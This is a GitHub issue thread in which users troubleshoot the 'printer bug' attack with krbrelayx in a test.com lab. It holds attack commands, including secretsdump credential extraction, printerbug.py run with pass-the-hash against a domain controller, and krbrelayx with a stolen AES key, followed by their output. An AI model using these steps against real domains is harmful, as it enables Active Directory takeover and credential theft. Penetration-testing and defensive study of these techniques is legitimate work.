-
Notifications
You must be signed in to change notification settings - Fork 170
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Printer bug doesn't work #10
Comments
It only authenticates with NTLM, which indicates that there is no SPN set for the cifs/attacker.test.com hostname. You probably skipped the step where you'd need to add an SPN for that host as well. |
In your blog, wrote need SPN with service HOST/attacker.test.com; secondary-dc.test.com=Windows 2012 server |
I'm not sure what would cause that but for some reason the secondary DC does not think your attacker account has unconstrained delegation. |
Great thanks; Last question ))) python rcpdump.py test\administrator@"ip address windows 2008 server" |
Not quite sure what causes this, could be something 2008 specific but I don't have it here to test. |
@girlgirlbest how did it work, I have added both HOST and CIFS but did not work for me . Still getting the below error. |
Hello help me please ; I'am read blog;
Use secretsdump,get account machine(computer.test.com) aes256 key & lm:ntlm hashes;
Add dns A record for my attacker machine. For ex. attacker.test.com
python krbrelayx.py -aesKEY "aes256key"
python printerbug.py -hashes lm:ntlm test.com/computer$@primary-dc.test.com attacker.test.com
printerbug output:
[] Attempting to trigger authentication via rprn RPC at primary-dc.test.com
[] Bind OK
[] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[] Triggered RPC backconnect, this may or ma not have worked
krbrelayx output:
Procotol client ldaps loaded..
Procotol client ldap loaded..
Procotol client smb loaded..
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
Computer.test.com =Windows 7
primary-dc.test.com = Windows 2012 server
attacker.test.com = kali
The text was updated successfully, but these errors were encountered: